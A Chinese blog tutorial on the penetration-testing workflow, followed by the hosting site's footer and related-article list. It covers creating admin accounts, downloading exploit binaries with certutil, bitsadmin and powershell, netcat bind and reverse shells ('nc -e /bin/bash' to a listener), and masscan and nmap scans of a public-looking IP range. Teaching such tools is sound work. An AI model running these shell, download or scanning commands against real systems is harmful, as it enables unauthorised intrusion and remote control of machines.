滲透測試流程-中篇

#作者:允砸兒

#日期:乙巳青蛇年? 四月廿一(2025年5月18日)

今天筆者帶大家繼續學習,網安的知識比較雜且知識面很廣,這一部分會介紹很多需要使用的工具。會用各種工具是做網安的基礎,ok咱們繼續一起深入了解。

筆者先回顧一下關于Windows命令和Linux命令:

Windows命令回顧

基礎命令:chdir(cd)、dir、whoami、ipconfig

#查看用戶

net user

#創建用戶

net user troyber/add

#設置密碼

net user troyber 123456

#設置成管理員

net localgroup administrators troyber/add

#激活

net user troyber/active

#刪除

net user troyber/delete

權限:

1、直接點擊鼠標右鍵屬性里面的安全編輯完全控制

2、Windows提權

文件下載:

把命令放到黑窗口里面

這是命令:(注意保存在那里? Windows+system32)

powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:80/ppp.php -OutFile abc.php "

certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe

bitsadmin /rawreturn /transfer down"http://127.0.0.1:8080/ms10-051.exe" c:\\exploit.exe

Linux命令回顧

基礎命令:pwd、id、ls

權限:Linux提權

ll-a

*? r (讀權限):表示有讀取文件或目錄內容的權限

*? w(寫權限):表示有寫入文件或目錄內容的權限

*? x(執行權限):表示有執行文件或目錄的權限

*? -(無權限):表示沒有相應的權限

chmod u
? ? ? ? ??g ?+(加入) ?r
? ? ? ? ??o? -(除去)w
? ? ? ? ? a ?=(設定) ?x ? ?文件或目錄

文件下載:

wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe

curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe

接下來筆者介紹一些工具#主要是幫助我們收集各種情報的

nc? (網貓)瑞士軍刀

概念

NetCat簡稱‘nc’,有著網絡安全界‘瑞士軍刀的美稱’,可以通過TCP/UDP協議讀寫,是一個好用穩定的連接系統后門的工具,同時也是一個網絡調試和開發工具。

參數

-l :開啟監聽

-p :指定端口

-t :以talent形式應答

-e :程序重定向

-n :以數字的形式顯示IP

-v :顯示執行命令過程

-z :不進行交互,直接顯示結果

-u :使用udp協議傳輸

-w :設置超時時間

-d :后臺運行

基礎使用

筆者帶大家做一個案例:簡單聊天

1、在安裝好nc的文件夾里的路徑中輸入cmd#注意要在nc.exe的文件夾里面輸入

2、打開兩次黑窗口一個作為服務端一個作為客戶端

3、在服務端輸入:D:\install\netcat\netcat-win32-1.12>nc.exe -lp 5566

? ? 在客戶端輸入:D:\install\netcat\netcat-win32-1.12>nc.exe 127.0.0.1 5566

我可以在服務端輸入hello客戶端也可以接收到hello

正向返回shell

前面的進黑窗口的步驟筆者省略了直接進行操作

1、在服務端:nc.exe -lp 5566 -e cmd.exe?

? 在客戶端:nc.exe 127.0.0.1 5566

#服務端我把cmd的權限給你了,在客戶端我得到了權限后,我第一次退出的是服務端,第二次退出的才是客戶端(本體)

反彈shell

在這里面筆者開一個2012的虛擬機進行操作,筆者會分為主機和虛擬機(Windows系統)進行操作#注意虛擬機里面也要有nc

我們通過正向shell的時候會被防火墻進行攔截(#注意做測試的時候需要關閉防火墻),所以我們使目標機主動向外發起連接這樣就會繞過防火墻建立通道。

主機啟動監聽窗口:nc.exe -lvp 5566

2012目標(通過漏洞利用、釣魚攻擊、惡意腳本等方式,讓目標機器執行一條反向連接命令)

nc.exe -e cmd 192.168.111.1 5566

目標機器主動連接到攻擊者的監聽端口,攻擊者獲得目標機器的Shell控制權。

Linux系統

主機啟動監聽窗口:nc -lvp 5566

目標機:nc -e /bin/bash 192.168.0.56 5566

文件傳輸

1、客戶端傳服務端

#服務端:nc -lp 5566 >outfile.txt

#客戶端:nc.exe 127.0.0.1 5566<a.txt

2、服務端傳客戶端

#客戶端:nc.exe 127.0.0.1 5566 >a.txt

#服務端:nc -lp 5566 <outfile.txt

*?>大于就相當于+ ?(輸入),<小于就相當于-(輸出),語句相反(端口隨便搞)

信息探測(情報)

1、端口掃描(kali執行)

nc -n -v -w1 -z 192.168.1.187 1-1000(w1一定要慢超時時間)

2、打印banner

echo " " |nc -n -v -w1 192.168.1.187 1-1000(html的一個界面,什么報錯信息都在banner里顯示)

masscan

概述

kali里面內置的工具,性能比nmap要高,可以先使用masscan對目標IP(通常是一個網段)進行全端口掃描,然后再使用nmap對存活主機的開放端口進行掃描,找出對應端口的服務存在的漏洞,使用
masscan對目標IP進行掃描的原因就是因為其速度快于nmap。

參數

基本掃描參數

-p :指定掃描的端口范圍

-P :設置目標主機的端口范圍

-iL :從文件中讀取目標IP地址

掃描速度和性能

--rate :設置掃描速度(數據包/秒)

--max-rate :設置最大掃描速度

--min-rate :設置最小掃描速度

--randomize-hosts :隨機掃描目標主機

輸出格式

-oL :以普通文本格式輸出結果

-oJ :以JSON格式輸出結果

-oG :以Drepable格式輸出結果

網絡探測

--ping :ping掃描,檢測存活主機

--banners :獲取主機服務的橫幅信息

基礎設置

--adapter :選擇網絡適配器

--router-mac:獲取主機服務的橫幅信息

實例

#掃描指定端口范圍和IP范圍

sudo masscan -p 80-90 --range 8.220.40.5-8.220.40.255

#檢查指定范圍的主機是否存活

sudo masscan --ping --range 8.220.40.5-8.220.40.255

#掃描所有端口,設置速率為任何值

masscan -p 1-65535 8.220.40.5 --rate 100

#從文件中讀取IP列表,輸出為JSON格式

masscan -iL targets.txt -oJ output.json

nmap

概述

功能強勁的掃描工具,kali里面自帶,支持端口掃描、主機探測、服務識別、系統識別

參數

端口掃描

-p 80 :掃80端口

-p 1-80 :掃1-80端口

-p 80,3389,22,21 :掃指定端口

主機探測

nmap -sP 8.220.40.5?

服務識別

nmap -sV?8.220.40.5? -p 80 nmap -sV?8.220.40.5

系統識別?

sudo nmap?-O?8.220.40.5 -p 8080

結果導出

sudo nmap?-O?8.220.40.5 -oN re.txt

總結:筆者這是簡單寫一下這些工具,要深入可以在網上搜素一下語句。需要多加練習熟悉了就記住怎么操作了。后面我會寫一下搜集情報的思路,情報學很重要。

人生每一個階段都能悟出不同的道理,人的自信重要,主動出擊也重要。有句俗語說的好,臨淵羨魚,不如退而結網。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/81545.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/81545.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/81545.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

[創業之路-358]:從歷史輪回到制度躍遷:中國共產黨創業模式的超越性密碼

人類文明的演進如同一條螺旋上升的階梯&#xff0c;從原始社會的公有制到資本主義私有制的巔峰&#xff0c;再到社會主義對公有制的重構&#xff0c;每一次制度迭代都伴隨著對前序文明的揚棄。中國共產黨自誕生之日起&#xff0c;便以“為人類求解放”為使命&#xff0c;在革命…

NLP基礎

目錄 一、NLP 概述和應用 &#xff08;一&#xff09;NLP 的定義與演進歷程 &#xff08;二&#xff09;NLP 的多元應用領域 二、文本預處理技術 &#xff08;一&#xff09;文本獲取與編碼轉換 &#xff08;二&#xff09;文本清洗&#xff1a;去除雜質的精細打磨 &…

【數據結構與算法】ArrayList 與順序表的實現

目錄 一、List 接口 1.1 List 接口的簡單介紹 1.1 常用方法 二、順序表 2.1 線性表的介紹 2.2 順序表的介紹 2.3 順序表的實現 2.3.1 前置條件:自定義異常 2.3.2 順序表的初始化 2.3.2 順序表的實現 三、ArrayList 實現類 3.1 ArrayList 的兩種使用方式 3.2 Array…

Linux518 YUM源倉庫回顧(需查)ssh 服務配置回顧 特定任務配置回顧

計劃配倉庫YUM源 為什么我在/soft文件夾下 使用yum install --downloadonly --downloaddir /soft samba 為什么文件夾下看不到samba文件 exiting because “Download Only” specified 計劃過 計劃配SSH 參考 ok了 計劃配置特定任務解決方案 code: 兩端先配好網絡 測試好s…

如何完美安裝GPU版本的torch、torchvision----解決torch安裝慢 無法安裝 需要翻墻安裝 安裝的是GPU版本但無法使用的GPU的錯誤

聲明&#xff1a; 本視頻靈感來自b站 如何解決所述問題 如何安裝對應版本的torch、torchvison 進入pytorch官網 進入歷史版本 這里以cuda11.8 torch 2.1.0為例演示 根據文檔找到要安裝的torch、torchvison版本 但不是使用命令行直接安裝 命令行直接安裝可能面臨著 安裝慢…

【iOS(swift)筆記-9】WKWebView無法訪問網絡

對于iOS 在info中添加App Transport Security Settings&#xff0c;然后在App Transport Security Settings里添加Allow Arbitrary Loadstrue 對于macOS 除了上面的操作&#xff0c;還需在項目信息的App Sandbox里有個Network打鉤選項

buck變換器的simulink/matlab仿真和python參數設計

什么是Buck電路? BUCK電路是一種降壓斬波器&#xff0c;降壓變換器輸出電壓平均值Uo總是小于輸出電壓UD。通常電感中的電流是否連續&#xff0c;取決于開關頻率、濾波電感L和電容C的數值。BUCK也是DC-DC基本拓撲&#xff0c;或者稱為電路結構&#xff0c;是最基本的DC-DC電路…

給個人程序加上MCP翅膀

背景 最近MCP這個詞真是到處都是&#xff0c;看起來特別高大上。我平時沒事的時候也一直在關注這方面的技術&#xff0c;知道它是怎么一回事&#xff0c;也懂該怎么去實現。但可惜一直抽不出時間來自己動手搞一個MCP服務。網上關于MCP的教程一搜一大把&#xff0c;但基本上都是…

AWS中國區CloudFront證書管理和應用指南

在AWS中國區使用CloudFront時,SSL/TLS證書的管理和應用是一個重要的環節。本文將詳細介紹如何在AWS中國區上傳、管理和應用SSL證書到CloudFront分配。 1. 準備證書文件 首先,我們需要準備好SSL證書相關的文件。通常,這包括: 私鑰文件(.key)公鑰證書文件(.crt)證書鏈文…

為什么hadoop不用Java的序列化?

Java的序列化是一個重量級序列化框架&#xff08;Serializable&#xff09;&#xff0c;一個對象被序列化后&#xff0c;會附帶很多額外的信息&#xff08;各種校驗信息&#xff0c;Header&#xff0c;繼承體系等&#xff09;&#xff0c;不便于在網絡中高效傳輸。所以&#xf…

Word壓縮解決方案

Word壓縮解決方案&#xff1a;基于圖片壓縮的 .docx 優化實踐 &#x1f4cc; 背景 在日常科研寫作或項目文檔整理中&#xff0c;Word 文檔&#xff08;.docx&#xff09;往往因為插入大量高清圖表、掃描圖像、公式圖等導致文件體積過大&#xff0c;或者畢業學位論文查重要求上…

基于基金凈值百分位的交易策略

策略來源&#xff1a;睿思量化小程序 基金凈值百分位&#xff0c;是衡量當前基金凈值在過去一段時間內的相對位置。以近一年為例&#xff0c;若某基金凈值百分位為30%&#xff0c;意味著過去一年中有30%的時間基金凈值低于當前值&#xff0c;70%的時間高于當前值。這一指標猶如…

數字人技術的核心:AI與動作捕捉的雙引擎驅動(210)

**摘要&#xff1a;**數字人技術從靜態建模邁向動態交互&#xff0c;AI與動作捕捉技術的深度融合推動其智能化發展。盡管面臨表情僵硬、動作脫節、交互機械等技術瓶頸&#xff0c;但通過多模態融合技術、輕量化動捕方案等創新&#xff0c;數字人正逐步實現自然交互與情感表達。…

基于OpenCV的實時文檔掃描與矯正技術

文章目錄 引言一、系統概述二、核心代碼解析1. 導入必要庫2. 輔助函數定義3. 坐標點排序函數4. 透視變換函數5. 主程序流程 三、完整代碼四、結語 引言 在日常工作和學習中&#xff0c;我們經常需要將紙質文檔數字化。手動拍攝文檔照片常常會出現角度傾斜、透視變形等問題&…

jenkins pipeline實現CI/CD

在企業級的架構中&#xff0c;CI/CD是必不可少的一個環節&#xff0c;它可以讓開發人員只關注于開發&#xff0c;而不必去關注項目的構建和部署&#xff0c;從而提高開發人員的效率。 本文我們來介紹一下使用jenkins 的pipeline來進行java項目的自動構建以及部署。我們通過腳本…

InfluxDB 3 Core + Java 11 + Spring Boot:打造高效物聯網數據平臺

一、 引言&#xff1a;為什么選擇InfluxDB 3&#xff1f; 項目背景&#xff1a; 在我們的隧道風機監控系統中&#xff0c;實時數據的采集、存儲和高效查詢是至關重要的核心需求。風機運行產生的振動、傾角、電流、溫度等參數是典型的時序數據&#xff0c;具有高并發寫入、數據…

泰國SAP ERP實施如何應對挑戰?工博科技賦能中企出海EEC戰略

泰國正依托"東部經濟走廊&#xff08;EEC&#xff09;"與RCEP協定疊加優勢&#xff0c;為中國企業提供面向亞太市場的戰略機遇。作為2022年泰國主要外資來源國之一&#xff0c;中國企業通過電子制造、智能家電、數據中心及新能源車等領域的投資深度參與泰國"4.0…

【設計模式】- 創建者模式

單例模型 餓漢式 靜態方法創建對象 public class Singleton {// 私有構造方法private Singleton(){}private static Singleton instance new Singleton();// 提供一個外界獲取的方法public static Singleton getInstance(){return instance;} }靜態代碼塊創建對象 public …

邏輯與非邏輯的彌聚

非邏輯彌聚與邏輯彌聚是復雜系統中兩種不同的信息整合方式。邏輯彌聚側重于通過明確的規則、規律和結構化方法&#xff0c;將分散的信息或功能進行有序的組織和集中處理&#xff0c;強調理性和確定性。而非邏輯彌聚則更多地涉及情感、直覺、經驗等非線性、非結構化的因素&#…

Linux進程信號(三)之信號產生2

文章目錄 4. 由軟件條件產生信號5. 硬件異常產生信號模擬一下除0錯誤和野指針異常除0錯誤野指針錯誤 總結思考一下 4. 由軟件條件產生信號 SIGPIPE是一種由軟件條件產生的信號,在“管道”中已經介紹過了。 軟件條件不就緒&#xff0c;很明顯這個軟件條件沒有直接報錯&#xff…